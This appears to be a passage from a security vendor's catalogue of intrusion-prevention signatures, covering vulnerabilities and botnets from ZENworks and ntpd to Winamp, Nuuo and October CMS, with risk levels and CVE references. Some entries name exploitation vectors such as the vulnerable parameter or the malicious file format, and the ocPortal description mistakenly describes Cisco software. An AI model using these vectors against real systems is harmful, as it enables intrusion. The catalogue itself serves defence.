https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3315

BID-15220
http://www.securityfocus.com/bid/15220

OSVDB-20363
http://www.osvdb.org/20363

OSVDB-20362
http://www.osvdb.org/20362

Novell-ZENworks-Pre-Authentication-Buffer-Overflow

About this vulnerability:

Pre-authentication buffer overflow vulnerability in Novell ZENworks

Risk:

Moderate

First detected in:

sgpkg-ips-36-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Desktop/Server Management

Type:

Buffer Overflow

Description:

Novell ZENworks has a pre-authentication buffer overflow vulnerability. A remote attacker can exploit this vulnerability to execute arbitrary code in the context of the vulnerable service.

Situation:

Generic_Novell-ZENworks-Pre-Authentication-Buffer-Overflow

References:

CVE-2005-1543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1543

BID-13678
http://www.securityfocus.com/bid/13678

Novell-ZENworks-Preboot-Service-Opcode-4c-Buffer-Overflow

About this vulnerability:

An attempt to exploit a buffer overflow vulnerability in Novell ZENworks Configuration Management detected

Risk:

High

First detected in:

sgpkg-ips-492-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Novell ZENworks Configuration Management 11.1 Preboot Service. Calling opcode 0x0000004c remotely, an attacker can inject the vulnerable system can exploit an insufficient boundary checking algorithm resulting to a buffer overflow. Attackers may leverage this to carry out code injection and execution attacks. Successful attacks can lead to execution of arbitrary code, resulting to a full system compromise.

Situation:

Generic_CS-Novell-ZENworks-Preboot-Service-Opcode-4c-Buffer-Overflow

References:

CVE-2011-3176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3176

OSVDB-80231
http://www.osvdb.org/80231

Novell-ZENworks-Preboot-Service-Opcode-6c-Buffer-Overflow

About this vulnerability:

An attempt to exploit a buffer overflow vulnerability in Novell ZENworks Configuration Management detected

Risk:

High

First detected in:

sgpkg-ips-492-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Novell ZENworks Configuration Management 11.1 Preboot Service. Calling opcode 0x0000006c remotely, an attacker can inject the vulnerable system can exploit an insufficient boundary checking algorithm resulting to a buffer overflow. Attackers may leverage this to carry out code injection and execution attacks. Successful attacks can lead to execution of arbitrary code, resulting to a full system compromise.

Situation:

Generic_CS-Novell-ZENworks-Preboot-Service-Opcode-6c-Buffer-Overflow

References:

CVE-2011-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3175

OSVDB-80231
http://www.osvdb.org/80231

Novell-ZENworks-Remote-Management-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell ZENworks

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Desktop Management

Type:

Input Validation

Description:

There is a vulnerability in the authentication mechanism of the Novell ZENWorks suite. The flaw is caused by insufficient boundary checking of authentication data. This vulnerability can be remotely exploited without credentials to execute arbitrary code on the target system within the system/root context. In a simple attack case aimed at creating a denial of service condition, the affected service will terminate. If the service is not configured to restart automatically, then the Novell ZfD Remote Management functionality will be unavailable until the server is restarted manually. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, normally System level.

Situation:

Generic_CS-Novell-ZENworks-Remote-Management-Buffer-Overflow

References:

CVE-2005-1543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1543

BID-13678
http://www.securityfocus.com/bid/13678

NOVUS-NConfig-SEH-Buffer-Overflow

About this vulnerability:	NOVUS NConfig SEH based buffer overflow vulnerability.
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	NOVUS
Type:	Buffer Overflow
Description:	An exception handler based buffer overflow vulnerability in NOVUS NConfig which can result in remote code execution.
Situation:	Generic_SS-NOVUS-NConfig-SEH-Buffer-Overflow

Now-SMS/MMS-Gateway-Buffer-Overflow

About this vulnerability:

Now SMS/MMS Gateway 2007.06.27 And Earlier Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows

Software:

Now SMS/MMS Gateway

Type:

Buffer Overflow

Description:

A multiple stack based buffer overflow vulnerability in Now SMS/MMS Gateway 2007.06.27 And Earlier which allows attackers to remotly execute arbitrary code via a long password in an authorization header to the HTTP service, a large packet to the SMPP service.

References:

CVE-2008-0871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0871

BID-27896
http://www.securityfocus.com/bid/27896

OSVDB-42953
http://www.osvdb.org/42953

NSClient++-ExternalScripts-Authenticated-RCE

About this vulnerability:	A vulnerability in NSClient++.
Risk:	High
First detected in:	sgpkg-ips-1368-5242
Last changed:	sgpkg-ips-1368-5242
Platform:	Windows
Software:	NSClient++
Type:	Insecure Configuration
Description:	A vulnerability in the NSClient++ module which allows remote attackers to start a privileged shell due to an insecure configuration.
Situation:	HTTP_CRL-NSClient++-ExternalScripts-Authenticated-RCE

NSEC3-Invalid-Response-Heap-Corruption

About this vulnerability:

A vulnerability in Windows 8 to Windows 10

Risk:

Moderate

First detected in:

sgpkg-ips-998-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

The Salt Length and Hash Length fields in DNS NSEC3 records are not checked against attacker controller buffer lengths allocated by the Windows DNS resolver code. Successful exploitation may lead to unauthenticated remote code execution and system compromise.

Situation:

DNS-UDP_NSEC3-Invalid-Field-Length

References:

CVE-2017-11779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11779

ms17-oct
http://technet.microsoft.com/security/bulletin/ms17-oct

NTLM-Credentials-Exposure

About this vulnerability:

A PDF file with possible NTLM credential exposure functionality detected

Risk:

Low

First detected in:

sgpkg-ips-1068-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Code Injection

Description:

There has been reported a vulnerability in PDF viewer applications, which could leak NTLM credentials from Windows operation system.

Situation:

File-PDF_NTLM-Credentials-Exposure

References:

CVE-2018-4993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4993

NTLM-Credentials-Leak-Via-Internet-Shortcut-CVE-2023-32046

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1609-5242

Last changed:

sgpkg-ips-1609-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Windows has a special URL file type that is used to create shortcuts to webpages. When Windows Explorer encounters such a file, it will automatically parse it to see if there is an icon associated to the shortcut. Setting the icon to an UNC path will cause Windows Explorer to try and load it, and thus, leaking NTLM credentials. Thus, if an attacker manages to drop a URL file in a user's folder, the user's NTLM credential is leaked every time the user views the folder in Explorer.

Situation:

File-Text_NTLM-Credential-Leak-Via-Internet-Shortcut-CVE-2023-32046
File-TextId_NTLM-Credential-Leak-Via-Internet-Shortcut-CVE-2023-32046

References:

CVE-2023-32046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32046

ms23-jul
http://technet.microsoft.com/security/bulletin/ms23-jul

NTLM-Hash-Disclosure-CVE-2024-43451

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1798-5242

Last changed:

sgpkg-ips-1798-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

NTLM hash disclosure vulnerability.

Situation:

File-Text_NTLM-Hash-Disclosure-CVE-2024-43451
File-TextId_NTLM-Hash-Disclosure-CVE-2024-43451

References:

CVE-2024-43451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43451

ms24-nov
http://technet.microsoft.com/security/bulletin/ms24-nov

Ntopng-Authentication-Bypass-CVE-2021-28073

About this vulnerability:

A vulnerability in ntopng

Risk:

High

First detected in:

sgpkg-ips-1828-5242

Last changed:

sgpkg-ips-1828-5242

Platform:

Generic

Software:

ntopng

Type:

Directory Traversal

Description:

An authentication bypass vulnerability exists in ntopng versions up to and including 4.2. A successful exploit allows unauthorized access to sensitive information.

Situation:

HTTP_CSU-Ntopng-Authentication-Bypass-CVE-2021-28073

References:

CVE-2021-28073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28073

Ntp-Daemon-Autokey-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in the Network Time Protocol daemon

Risk:

High

First detected in:

sgpkg-ips-222-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Network Time Protocol daemon (ntpd). The flaw is due to a boundary error when processing crafted packets sent to the daemon. A successful exploitation of the vulnerability may lead to code execution in the context of the daemon process.

Situation:

NTP_UDP-Ntp-Daemon-Autokey-Stack-Buffer-Overflow

References:

CVE-2009-1252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252

BID-35017
http://www.securityfocus.com/bid/35017

Ntp-Daemon-Readvar-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in the Network Time Protocol daemon

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Buffer Overflow

Description:

Situation:

NTP_UDP-Ntp-Daemon-Readvar-Stack-Buffer-Overflow

References:

CVE-2001-0414
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0414

BID-2540
http://www.securityfocus.com/bid/2540

OSVDB-805
http://www.osvdb.org/805

Ntp-Mode-7-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in the Network Time Protocol (NTP) daemon

Risk:

High

First detected in:

sgpkg-ips-273-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

ntpd

Type:

Malfunction

Description:

There is a denial of service vulnerability in the Network Time Protocol (NTP) daemon. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted mode 7 request to the target NTP server.

Situation:

Analyzer_NTP-Mode-7-Denial-Of-Service
NTP_UDP-Ntp-Mode-7-Denial-Of-Service-Exploit

References:

CVE-2009-3563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563

BID-37255
http://www.securityfocus.com/bid/37255

OSVDB-60847
http://www.osvdb.org/60847

Ntp-Monlist-Denial-Of-Service

About this vulnerability:

Deprecated NTP REQ_MON_GETLIST or REQ_MON_GETLIST_1 control instruction may be used in a DoS

Risk:

Moderate

First detected in:

sgpkg-ips-563-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Misconfiguration

Description:

Forged NTP REQ_MON_GETLIST and REQ_MON_GETLIST_1 control instructions can be used to make an NTP server DoS a victim computer. These commands have been deprecated since NTP version 4.2.7.

Situation:

NTP_UDP-Ntp-Monlist-Command

References:

CVE-2013-5211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211

Ntp.org-Network-Time-Protocol-Windows-Daemon-Getendptfromioctx-Denial-Of-Service

About this vulnerability:

A vulnerability in ntp.org NTP

Risk:

Moderate

First detected in:

sgpkg-ips-835-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Malfunction

Description:

Improper processing of large packets results in a vulnerability in ntp.org ntpd. A successful exploitation will cause a denial of service condition.

Situation:

NTP_UDP-Ntp.org-Network-Time-Protocol-Windows-Daemon-Getendptfromioctx-Denial-Of-Service

References:

CVE-2016-9312
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9312

NTPsec-ntpd-Process-Control-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in NTPsec ntpd

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Input Validation

Description:

A vulnerability in NTPsec ntpd, versions prior to 1.1.3, which could result in information disclosure due to the insufficient validation of the address of a field to be read in an ntp packet.

Situation:

NTP_UDP-NTPsec-ntpd-Process-Control-Out-Of-Bounds-Read

References:

CVE-2019-6444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6444

NTPsec-ntpd-Write-Variables-DoS

About this vulnerability:

A vulnerability in NTPsec ntpd

Risk:

High

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Input Validation

Description:

A vulnerability in NTPsec ntpd, versions prior to 1.1.3, which allows remote attackers to cause a denial of service condition by sending a crafted packet, due to insufficient validation of the message.

Situation:

NTP_UDP-NTPsec-ntpd-Write-Variables-DoS

References:

CVE-2019-6445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6445

NTR-ActiveX-Control-Check-Buffer-Overflow

About this vulnerability:

An NTR ActiveX Control Check Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-714-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

NTRglobal

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in the Check method in NTRglobal ActiveX control, versions before 2.0.4.8, which allows remote attackers to execute arbitrary code.

Situation:

File-Text_NTR-ActiveX-Control-Check-Buffer-Overflow

References:

CVE-2012-0266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0266

BID-51374
http://www.securityfocus.com/bid/51374

OSVDB-78252
http://www.osvdb.org/78252

NTR-ActiveX-StopModule-Code-Execution

About this vulnerability:

An NTR ActiveX StopModule Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-714-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista

Software:

NTRglobal

Type:

Configuration Error

Description:

A vulnerability in the StopModule method in the NTRglobal ActiveX control, versions before 2.0.4.8, which allows remote attackers to execute arbitrary code via a crafted iModule parameter.

Situation:

File-Text_NTR-ActiveX-StopModule-Code-Execution

References:

CVE-2012-0267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0267

BID-51374
http://www.securityfocus.com/bid/51374

OSVDB-78253
http://www.osvdb.org/78253

Nucrypt

About this vulnerability:	Nucrypt
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Nucrypt is a Botnet responsible for sending spam.
Situation:	HTTP_CSU-Nucrypt-Activity

NuggetPhantom-Infection-Traffic

About this vulnerability:	NuggetPhantom infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1359-5242
Last changed:	sgpkg-ips-1359-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	NuggetPhantom infection traffic was detected.
Situation:	HTTP_CSU-NuggetPhantom-Infection-Traffic

Nullsoft-Scriptable-Installation-System-Download-Plugin

About this vulnerability:	Nullsoft Scriptable Installation System arbitary file download
Risk:	Low
First detected in:	sgpkg-ips-146-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Nullsoft Scriptable Installation System
Type:	Insecure Configuration
Description:	Nullsoft Scriptable Installation System (NSIS) is a framework used to create software installation packages. It contains various plugins and extensions, including a plug in that allows download of arbitrary files from a remote server.
Situation:	HTTP_CSH-Nullsoft-Scriptable-Installation-System-Download-Plugin

Nullsoft-SHOUTcast-Server-Log-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nullcast Shoutcast Server

Risk:

Low

First detected in:

sgpkg-ips-162-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows

Software:

SHOUTcast Server

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in Nullsoft SHOUTcast Server. The vulnerability is due to insufficient input validation before writing to the request log file. Successful exploitation may allow information forgery and code execution in the context of the administration interface of the SHOUTcast Server.

Situation:

HTTP_CS-Nullsoft-SHOUTcast-Server-Log-Cross-Site-Scripting

References:

CVE-2007-1229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1229

BID-22742
http://www.securityfocus.com/bid/22742

OSVDB-33793
http://www.osvdb.org/33793

Nullsoft-Winamp-Advanced-Module-Format-File-Buffer-Overflow

About this vulnerability:

A vulnerability in NullSoft WinAmp

Risk:

Moderate

First detected in:

sgpkg-ips-422-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Winamp

Type:

Buffer Overflow

Description:

There is a code execution vulnerability in Nullsoft Winamp. This vulnerability is due to a heap buffer overflow while handling crafted .amf files. Remote attackers can exploit this vulnerability by enticing the target user to open specially crafted files. Successful exploitation would lead to to arbitrary code execution in the security context of the logged-in user.

Situation:

File-Binary_Nullsoft-Winamp-Advanced-Module-Format-File-Buffer-Overflow

References:

OSVDB-76635
http://www.osvdb.org/76635

Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in NullSoft WinAmp

Risk:

High

First detected in:

sgpkg-ips-224-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Winamp

Type:

Buffer Overflow

Description:

There is a vulnerability in Nullsoft Winamp. The vulnerability is caused by improper handling of the header of Audio Interchange File Format (AIFF) media files. A remote attacker can exploit this vulnerability by enticing the user to open a crafted AIFF file, thereby creating a denial of service condition or potentially injecting and executing arbitrary code on the target system.

Situation:

HTTP_SS-Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow
File-Binary_Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow

References:

BID-33226
http://www.securityfocus.com/bid/33226

Nullsoft-Winamp-AVI-Stream-Count-Integer-Overflow

About this vulnerability:

A vulnerability in NullSoft WinAmp

Risk:

Moderate

First detected in:

sgpkg-ips-431-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Winamp

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Winamp. The vulnerability is due to an integer overflow when a stream count from an AVI file is used in a buffer size calculation. A remote unauthenticated attacker can exploit this vulnerability by enticing a target user to open a crafted AVI file. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user.

Situation:

File-RIFF_Nullsoft-Winamp-AVI-Stream-Count-Integer-Overflow

References:

CVE-2011-3834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3834

OSVDB-77636
http://www.osvdb.org/77636

Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow

About this vulnerability:

A vulnerability in NullSoft WinAmp

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Winamp

Type:

Integer Overflow

Description:

A vulnerability exists in the CAF (Core Audio Format) file parsing component of Nullsoft Winamp.

Situation:

HTTP_SS-Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow
File-Binary_Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow

References:

CVE-2009-0186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0186

BID-33963
http://www.securityfocus.com/bid/33963

Nullsoft-Winamp-MIDI-File-Buffer-Overflow

About this vulnerability:

A vulnerability in NullSoft WinAmp

Risk:

Moderate

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Winamp

Type:

Buffer Overflow

Description:

There exists a code execution vulnerability in Nullsoft Winamp. A remote attacker can use this to execute arbitrary code in the security context of the logged-in user.

Situation:

File-Binary_Nullsoft-Winamp-MIDI-File-Buffer-Overflow

References:

OSVDB-76634
http://www.osvdb.org/76634

Nullsoft-Winamp-MIDI-File-Header-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Nullsoft Winamp

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Winamp

Type:

Malfunction

Description:

There is a vulnerability in the MIDI file parsing component of Nullsoft Winamp. The vulnerability is caused by the improper handling of the header of a MIDI media file. A remote attacker can exploit this vulnerability by enticing the user to open a crafted MIDI file, thereby creating a denial of service condition or potentially injecting and executing arbitrary code on the target system. Upon an unsuccessful attack attempting to leverage this vulnerability, the Winamp player will terminate. In an attack scenario where arbitrary code is injected and executed on the target machine, the behaviour of the target host is dependent on the intention of the malicious code. Any code injected into the vulnerable program would execute in the security context of the currently logged in user.

Situation:

File-Binary_Nullsoft-Winamp-MIDI-File-Header-Handling-Buffer-Overflow

References:

CVE-2006-3228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3228

BID-18507
http://www.securityfocus.com/bid/18507

Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in NullSoft WinAmp
Risk:	High
First detected in:	sgpkg-ips-367-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Winamp
Type:	Buffer Overflow
Description:	There is a code execution vulnerability in Nullsoft Winamp. The vulnerability is due to a boundary error while handling timestamps in MIDI files. Remote attackers can exploit this vulnerability by enticing the target user to open a specially crafted MIDI file. Successful exploitation leads to to arbitrary code execution in the security context of the logged-in user.
Situation:	HTTP_SS-Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow File-Binary_Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow

Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Nullsoft Winamp

Risk:

Moderate

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Winamp

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Nullsoft Winamp. The vulnerability is due to improper handling of certain exceptional conditions that could occur while processing crafted MP4 files. Remote attackers can exploit this vulnerability by enticing target users to open a crafted MP4 file that causes memory corruption. Successful exploitation may lead to arbitrary code execution in the security context of the currently logged in user.

Situation:

HTTP_Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption
File-MPEG_Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption

References:

CVE-2007-2498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2498

BID-23723
http://www.securityfocus.com/bid/23723

Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Nullsoft Winamp

Risk:

High

First detected in:

sgpkg-ips-142-2032

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows

Software:

Winamp

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Nullsoft Winamp Player. The vulnerability is due to boundary errors when parsing metadata in Ultravox streaming protocol. An attacker may exploit the vulnerability by enticing a user to visit a malicious server with the affected product, resulting in execution of arbitrary code on the target host within the security context of the currently logged in user.

Situation:

HTTP_SS-Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-BOF
File-Binary_Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-BOF

References:

CVE-2008-0065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0065

BID-27344
http://www.securityfocus.com/bid/27344

Nuuo-CMS-Arbitrary-File-Download

About this vulnerability:

A vulnerability in Nuuo CMS

Risk:

High

First detected in:

sgpkg-ips-1152-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nuuo CMS

Type:

Directory Traversal

Description:

A vulnerability in Nuuo CMS, versions below and including 3.5, which allows remote attackers to execute arbitrary code or obtain restricted information due to the application allowing input to construct a pathname that is outside of the intended directory.

Situation:

Generic_CS-Nuuo-CMS-Arbitrary-File-Download

References:

CVE-2018-17934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17934

Nuuo-NVRmini-Upgrade_handle.php-Remote-Command-Execution

About this vulnerability:

A vulnerability in NUUO NVRmini devices

Risk:

High

First detected in:

sgpkg-ips-1152-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NUUO NVRmini

Type:

Input Validation

Description:

A vulnerability in NUUO NVRmini devices which allows remote attackers to execute arbitrary code due to insufficient input validation of the uploaddir parameter for a writeuploaddir command to upgrade_handle.php.

Situation:

HTTP_CRL-Nuuo-NVRmini-Upgrade_handle.php-Remote-Command-Execution

References:

CVE-2018-14933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14933

Nuxeo-Nuxeounknownresource-Expression-Language-Injection

About this vulnerability:

A vulnerability in Nuxeo Nuxeo

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nuxeo

Type:

Input Validation

Description:

Insufficient validation of user supplied HTTP URIs causes an expression language injection vulnerability in the Nuxeo CMS. A successful exploit allow an attacker to run code with the privlieges of the Nuxeo user.

Situation:

HTTP_CRL-Nuxeo-Nuxeounknownresource-Expression-Language-Injection

References:

CVE-2018-16341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16341

Nymaim-Botnet

About this vulnerability:	Nymaim botnet
Risk:	High
First detected in:	sgpkg-ips-753-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Nymaim is a malicious botnet which poses a serious threat to Internet users. Most notably, Nymaim engages in trojan activity as an information stealer and web proxy. In addition, it may download further malicious modules. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately.
Situation:	File-Text_Shiotop-Botnet-Traffic File-Text_Nymaim-Botnet-Traffic

Object-Classid-In-Nonstandard-Format

About this vulnerability:	A nonstandard format of the class id of an object was detected
Risk:	Moderate
First detected in:	sgpkg-ips-470-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Format String
Description:	A nonstandard format of the class id of an object was detected
Situation:	File-Text_Object-Classid-In-Nonstandard-Format File-Text_Classid-Obfuscated-Reference

ocPortal-Arbitrary-File-Inclusion

About this vulnerability:	ocPortal Arbitrary File Inclusion
Risk:	High
First detected in:	sgpkg-ips-631-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	ocPortal
Type:	Input Validation
Description:	There exists a vulnerability in Cisco Collaboration Server that allows an unauthorized user to upload files and gain administrative privileges.
Situation:	HTTP_CRL-ocPortal-Arbitrary-File-Inclusion-Vulnerability

OCS-Inventory-NG-Commandline.php-Command-Injection

About this vulnerability:

A vulnerability in OCS Inventory

Risk:

Moderate

First detected in:

sgpkg-ips-1271-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OCS Inventory

Type:

Input Validation

Description:

There exists a command injection vulnerability in OCS Inventory. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-OCS-Inventory-NG-Commandline.php-Command-Injection

References:

CVE-2020-14947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14947

October-CMS-Remote-Code-Execution

About this vulnerability:

A vulnerability in October CMS

Risk:

High

First detected in:

sgpkg-ips-1200-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

October CMS

Type:

Input Validation

Description:

A vulnerability in October CMS, version v1.0.412, which allows remote attackers to execute arbitrary code in the file upload functionality.

Situation:

HTTP_CS-Php-POST-File-Upload-Buffer-Overflow

References:

CVE-2017-1000119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000119

October-CMS-Unauthorized-Password-Change-CVE-2021-32648

About this vulnerability:

An attempt to exploit a vulnerability in October CMS detected

Risk:

High

First detected in:

sgpkg-ips-1429-5242

Last changed:

sgpkg-ips-1429-5242

Platform:

Generic

Software:

October CMS

Type:

Type Confusion

Description:

An authentication bypass vulnerability has been reported in October CMS. A remote attacker can use this vulnerability to reset any October CMS user passwords via a crafted HTTP POST request.

Situation:

File-Text_October-CMS-Unauthorized-Password-Change-CVE-2021-32648

References:

CVE-2021-32648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32648

Octopus-C2-Infection-Traffic

About this vulnerability:	Octopus C2 framework infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1272-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Octopus C2 framework infection traffic was detected.
Situation:	HTTP_SLS-Octopus-C2-Infection-Traffic File-Text_Octopus-C2-Initial-Infection-Traffic

Octoshape-P2P-Plugin-Usage

About this vulnerability:	Octoshape P2P plugin usage
Risk:	Moderate
First detected in:	sgpkg-ips-381-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Octoshape
Type:	Peer-to-Peer
Description:	Octoshape is a peer-to-peer media streaming platform that can be used by media providers to improve quality of service for their users. Octoshape comes as an automatically installed Flash plugin and can generate a lot of incoming and outgoing traffic that might be unwanted.
Situation:	HTTP_CSH-Octoshape-P2P-Plugin

Office-BMP-Integer-Overflow-CVE-2009-2518

About this vulnerability:

An integer overflow vulnerability in Microsoft Office XP

Risk:

High

First detected in:

sgpkg-ips-259-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP

Type:

Malfunction

Description:

There is an integer overflow vulnerability in Microsoft Office XP. A successful attack may lead to non-privileged arbitrary code execution.

Situation:

E-Mail_BS-Malicious-BMP-File-CVE-2009-2518
HTTP_SS-Malicious-BMP-File-CVE-2009-2518
HTTP_SS-Office-BMP-Integer-Overflow-CVE-2009-2518
File-OLE_Office-BMP-Integer-Overflow-CVE-2009-2518
File-Binary_Malicious-BMP-File-CVE-2009-2518

References:

CVE-2009-2518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2518

MS09-062
http://technet.microsoft.com/security/bulletin/MS09-062

Office-Macro-Document

